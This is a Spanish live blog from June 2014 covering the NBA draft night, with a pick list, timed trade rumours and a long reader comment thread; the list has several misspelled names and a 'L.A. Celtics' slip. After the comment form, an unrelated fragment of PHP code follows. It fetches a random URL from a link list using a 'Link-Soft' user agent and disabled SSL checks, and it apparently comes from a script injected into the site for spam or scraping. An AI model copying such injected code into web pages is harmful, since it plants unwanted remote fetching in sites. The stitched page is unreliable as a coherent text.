Movimientos de cara al draft

27 de June de 2014 por txusma

Hoy a la 1h00 hora española se llevará a cabo el draft de la NBA, una edición de la que se ha venido hablando durante años y por la que muchos equipos han renunciado a competir en pos de mejorar sus posibilidades de obtener una buena elección. Las horas previas del draft son siempre ricas en rumores y movimientos y en este post os iremos presentando las novedades que vayan surgiendo.

DRAFT 2014

Y así va quedando el draft de la NBA 2014:

1. Cleveland Cavaliers: Andrew Wiggins
2. Milwaukee Bucks: Jabari Parker
3. Philadelphia 76ers: Joel Embiid
4. Orlando Magic: Aaron Gordon
5. Utah Jazz: Dante Exus
6. Boston Celtics: Marcus Smart
7. L.A. Celtics: Julius Randle
8. Sacramento Kings: Nik Staukas
9. Charlotte Hornets: Noah Vonleh
10. Philadelphia 76ers: Elfrid Payton (a Orlando)
11. Denver Nuggets: Doug McDermott (a Chicago por picks 16 y 19)
12. Orlando Magic: Dario Saric (a Philadelphia)
13 Minnesota Timberwolves: Zach LaVine
14. Phoenix Suns: TJ Warren
15. Atlanta Hawks: Adreian Payne
16. Denver Nuggets (via Chicago): Jusuf Nurkic
17. Boston Celtics: James Young
18. Phoenix Suns: Tyler Ennis
19. Denver Nuggets (via Chicago): Gary Harris

01h00

Todo está preparado en la Green Room y los GM agotan las posibilidades de cerrar acuerdos ya sea para elegir más arriba, liberar salario de cara al mercado de agentes libres o, simplemente, mejorar su plantilla. Nada se concreta pero, por supuesto, hay rumores:

  • Fuentes de la NBA indican que Lakers y Celtics negocian el intercambio de Rondo por pick 7.
  • Wojnarowski asegura que los Pelicans buscan destino a Ryan Anderson y Austin Rivers.
  • Aaron Gordon apunta más arriba de lo que en principio se suponía y puede ser top 5, por delante de Voleh y Randle.
  • Los Nets buscan un pick entre los 20 primeros.

23h40

Menos de 1 hora y media para que de comienzo la ceremonia del draft y los Sixers siguen con las dudas pero que nadie se sorprendra que acaben escogiendo a Joel Embiid aunque eso signifique que por segundo año consecutivo el primer rookie que escojan en el draft se pierda toda su primera temporada. Si los Sixers al final se deciden por Dante Exum, el camerunés tiene números de caer hasta la 6ª elección de los Celtics. De todas maneras, sobrevuela el rumor de que los Sixers podrían hacerse con el número 1 del draft a cambio del 3, el 10 y Thaddeus Young. En ese caso, escogerían sin dudarlo a Andrew Wiggins. Los Cavs, con la 3ª, seguramente también se decantarían por el Embiid.

Otros elecciones ganan también fuerza como la 5ª de Marcus Smart a pesar de no haber entrenado con los Jazz y la 9ª de Doug McDermott para los Bobcats que buscan un tirador desesperadamente. Si no les llegara McDermott el escogido sería Nik Stauskas.

Y no nos olvidamos de Rajon Rondo que no tiene asegurado seguir perteneciendo a los Boston Celtics cuando acabe la jornada. Podría acabar en los Kings a cambio de la 8ª elección.

18h20

Las incógnitas del draft empiezan con el pick número 1. Los Cavs siguen dudando entre Wiggins y Parker, e incluso se plantean escoger a Dante Exum. Sin embargo, se comenta que el australiano no ha querido acudir a Cleveland para un workout.

Parece que se está fraguando un traspaso entre Toronto Raptors y Memphis Grizzies que acabaría con Tayshaun Prince y el pick 22 camino de Canadá a cambio de la 37 y John Salmons.

17h15

Aarron Afflalo es el primer protagonista del draft day. El escolta regresa a los Denver Nuggets, que a cambio envían a Orlando su pick 56 del draft de esta noche y a Evan Fournier.

14h20

Decisiones por tomar, promesas, traspasos… El draft se acerca.

  • Los Cavs siguen decidirse entre Jabari Parker y Andrew Wiggins. Dan Gilbert y los técnicos no se ponen de acuerdo y teniendo en cuenta que el año pasado Gilbert cedió y Mike Brown acabó escogiendo a Bennett en lugar de Oladipo no está claro que este año vaya a apartarse fan fácilmente. Si los Cavs acabaran traspasando la elección a Bucks, Magic, Jazz o Celtics estos escogerían a Parker. Si fueran los Sixers, se llevarían a Wiggins.
  • Mitch McGary puede tener una promesa por parte de los Bucks de ser escogido con la 1ª elección de la 2ª ronda. Esto permitiría al pívot de Michigan negociar su contrato.
  • Precisamente, los Bucks tienen apuntado el nombre de Thanasis Antetokounmpo para las últimas elecciones de la 2ª ronda. Me gustaría saber cómo distinguirán las camisetas llegado el momento.
  • Los Clippers tienen la elección 28 de la 1ª ronda pero parece que ni tienen ganas de añadir a un rookie a su plantilla. La idea es traspasar la elección junto a Willie Green y algún otro jugador (Crawford, Barnes o Dudley). Durante un tiempo sonó el nombre de Gerald Henderson.
  • Los Heat han echado el ojo sobre Shabazz Napier e intentarán escalar posiciones en el draft para escogerlo.

 

9h30

Se han confirmado los 2 primeros traspasos de la post-temporada:

  • Omer Asik llega a New Orleans Pelicans a cambio de una 1ª ronda de 2015
  • Tyson Chandler y Raymond Felton se van a los Mavs a cambio de Jose Calderon, Samuel Dalembert, Shane Larkin, Wayne Ellington y las elecciones 34 y 51 del draft de esta noche.

Los Pelicans siguen apostando fuerte y la mala suerte del año pasado con las lesiones no les ha asustado lo más mínimo. El turco Asik es toda una mejora en la posición de pívot y formará un juego interior potentísimo con Anthony Davis y Ryan Anderson. Por su parte, los Rockets empiezan a hacer hueco para ofrecer el máximo a Lebron James o Carmelo Anthony. Los anuncios de que estos dos jugadores serán agentes libres a partir del 1 de Julio ha acelerado los planes de los tejanos.

Mavs y Knicks intercambian piezas en un traspaso que parece bueno para ambos. Calderon ha sido el elegido por Phil Jackson y Derek Fisher para desarrollar el triangulo en los Knicks y además estos ganan algo de flexibilidad salarial mientras que Chandler vuelve a los Mavs buscando recuperar el nivel que le comportó el premio de DPY hace 2 temporadas.

Y sobre el draft sigue sin estar del todo claro quien será escogido en el número 1 del draft pero la gran cuestión es en que elección sonará el nombre de Joel Embiid. En general todos están de acuerdo en que no pasará de la 6ª elección de los Celtics pero no se descarta que Sixers (3) y Magic (4) lo escojan con anterioridad. Sólo 5 equipos (Cleveland, Milwaukee, Philadelphia, Boston y Lakers) tienen ahora mismo los informes médicos del camerunés pero muchos otros están intentando comprarlos.

Comenta

109 comentarios a esta entrada

  1. txusma dice:
    #1

    Payton sonaba para la 8ª elección de los Kings.

    Los Celtics se llevan a Smart y Young, intesante pareja.

    Y aquí os dejo q esto se hace muuuy largo

      Citar

  2. Denise dice:
    #2

    Encima leo ahora que en el Saric-Payton, Orlando le da una primera ronda de 2017, pero vamos a ver ¿con quien ha empatado Elfryd Payton para ir regalando rondas? Puto Hennigan haber elegido a Ennis, Napier ó Lavine y te olvidas de tener que regalar nada.
    Es para coger al trio DeVos-Hennigan-Vaughn, sacarlo al Downtown de Orlando, y preparar una guillotina tal Plaza de la Bastilla y Luis XVI

      Citar

  3. Denise dice:
    #3

    Napier traspasado a los Heat; y Clint Capela drafteado por los Rockets. Robazo para los texanos.

      Citar

  4. Mamba_Blanca dice:
    #4

    Veremos que hace POP con Kyle Anderson, es un base de 2.07 que asiste y rebotea bien, se llego a hablar de un TOP15.

      Citar

  5. Ruxixon dice:
    #5

    Napier a los Heat me parece una buena noticia si LeBron sigue en Miami,que es lo más probable.De hecho él no se cortó en twitter diciendo que era su jugador favorito de este draft.Parece evidente que la franquicia va a moverse siguiendo sus deseos.Ahora toca pasar de Chalmers (me pega en Dallas) y a traspasar a Cole.

    Denise:
    Encima leo ahora que en el Saric-Payton, Orlando le da una primera ronda de 2017, pero vamos a ver ¿con quien ha empatado Elfryd Payton para ir regalando rondas? Puto Hennigan haber elegido a Ennis, Napier ó Lavine y te olvidas de tener que regalar nada.
    Es para coger al trio DeVos-Hennigan-Vaughn, sacarlo al Downtown de Orlando, y preparar una guillotina tal Plaza de la Bastilla y Luis XVI

    Incluso se ha dicho que han dado aparte de ese pick de 2017,una segunda ronda de 2015.Todo esto para lograr a Payton.Han tenido un miedo terrible a quedarse sin Gordon o un PF complementario a Vucevic en el 12 -como así ha sido,todos los PF salieron antes- y eso ha precipitado los acontecimientos.Demos tiempo para ver la valía de los rookies,yo confio en Gordon como un buen jugador,y apuesto a que el paso del tiempo dirá que fue una elección acertada.Y Payton también suma en defensa,algo que Orlando agradecerá.Por contra en ataque parece que se quedan cortos,y por eso el trade de Afflalo me parece aún más un sinsentido.

      Citar

  6. Ruxixon dice:
    #6

    El draft de los 76ers es épico……en el 3 un jugador lesionado,3 jugadores europeos que habrá que ver si dan el salto,en el 32 McDaniels,en el 39 Jerami Grant y McRae.No avanzan nada para esta próxima temporada pero si el plan sale bien,con Micic y Saric evolucionando bien y Embiid volviendo sin problemas de lesiones,tienen un equipazo.Falta ver qué tipo de traspaso aceptarán por T.Young,si uno con jugadores de por medio que les puedan valer,o regalarlo como hicieron con Evan Turner.

    Mirando un poco al detalle:

    – Kyle Anderson fenomenal para el juego coral de los Spurs,otro tipo que sabe mover muy bien la bola,proyectado lottery y cae hasta el 30,límite de la segunda ronda.Y eso con la habilidad que tienen ahí para exprimir todo el talento de elecciones bajas.

    – Con la oportunidad que les dejó Orlando,Utah ha sido uno de los ganadores de la noche: Burke – Exum – Hood,más Hayward,Kanter y Favors por ahí,han dado un impulso importante a su futuro.

    – Boston con la tontuna también han salido reforzados,aunque queda un poco en incógnita que harán con Rondo,que queda ahí un poco fuera de lo que parece un proyecto a largo plazo con Smart-Young-Sullinger como núcleo.También metemos junto a Rondo a Jeff Green y a Gerald Wallace.

    – Minny…no sé,un poco en la dinámica de los últimos tiempos.Por potencial Lavine puede ser un bicho importante,pero es que repites la jugada de Muhammad (e igual matas a éste definitvamente),y te queda un equipo muy raro,con cosas inconexas y que no sirven para convencer a Love.A ver si con su traspaso pueden enfocar correctamente a la franquicia,pero una cosa queda clara,Love hoy vale menos que ayer.Y cuanto más tarden peor.

    – Hay bastantes undrafted aprovechables.A mí por ejemplo un tio como Patric Young me parece un lujazo para cualquier equipo,un currante de la leche.En la Summer League se gana un hueco.Wilbekin también me gusta mucho y está por ahí libre.Otro tipo que por cms puede encontrar equipo es Bachynski.No sé,pintan entretenidas las SL de Orlando y Las Vegas.

      Citar

  7. Denise dice:
    #7

    Ruxixon:
    Napier a los Heat me parece una buena noticia si LeBron sigue en Miami,que es lo más probable.De hecho él no se cortó en twitter diciendo que era su jugador favorito de este draft.Parece evidente que la franquicia va a moverse siguiendo sus deseos.Ahora toca pasar de Chalmers (me pega en Dallas) y a traspasar a Cole.

    Incluso se ha dicho que han dado aparte de ese pick de 2017,una segunda ronda de 2015.Todo esto para lograr a Payton.Han tenido un miedo terrible a quedarse sin Gordon o un PF complementario a Vucevic en el 12 -como así ha sido,todos los PF salieron antes- y eso ha precipitado los acontecimientos.Demos tiempo para ver la valía de los rookies,yo confio en Gordon como un buen jugador,y apuesto a que el paso del tiempo dirá que fue una elección acertada.Y Payton también suma en defensa,algo que Orlando agradecerá.Por contra en ataque parece que se quedan cortos,y por eso el trade de Afflalo me parece aún más un sinsentido.

    Yo no dudo de que Gordon sea un buen jugador, pero estamos hablando de un pick 4 y de una posición como la de PF donde con Harris y Nicholson la tienes mas cubierta que todo el perimetro. Si querían a Gordon a toda costa, podrían haber usado otras alternativas, como elegir a Exum en el pick 4, y al que eligiese Gordon (supongamos el pick 9) darle el pick 12 + Afflalo.
    Y lo de Payton es incomprensible, ni que fuese el nuevo Magic Johnson…dando rondas por él cuando aun estaban libres Ennis y Payne.
    En fin, para tener esta franquicia fantasma, mejor que la vendan a Seattle

      Citar

  8. txusma dice:
    #8

    Gordon no pasaba de la 5 de Utah y odos los mocks apostaban porque sería el primer PF en salir. El plan de los Magic debía ser Gordon en la 4 y fijo q nos llega Payton en la 12 (q como dije antes sonaba para la 8 de los Kings, no ha sido drafteado muy por encima de lo q se preveía). Los Sixers pillan a Payton yo creo q para joder y los Magic reaccionan rápido.
    Yo no sé qué pasará en el futuro pero todos los analistas apuntan q Payton es y será mejor que Tyler Ennis. Y con la elección de Gordon, y con Harris y Nicholson por ahí, para que Payne?

    La alternativa hubiera sido Exum en la 4 y Payne en la 12. O tal vez, ofrecer la 12 + Afflalo, como dices, por Noah Vonleh.

      Citar

  9. Denise dice:
    #9

    txusma:

    Yo no sé qué pasará en el futuro pero todos los analistas apuntan q Payton es y será mejor que Tyler Ennis. Y con la elección de Gordon, y con Harris y Nicholson por ahí, para que Payne?

    Quería decir Lavine…

    Que listos son los jodidos Spurs, Kyle Anderson es un robazo, al igual que Napier, Capela y Rodney Hood. La verdad es que los Jazz han triunfado con el Draft. Y de Russ Smith, vi videos suyos y desconozco por qué ha caido tan bajo (pick 47) pero me parece un jugador de rotación mas que interesante.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>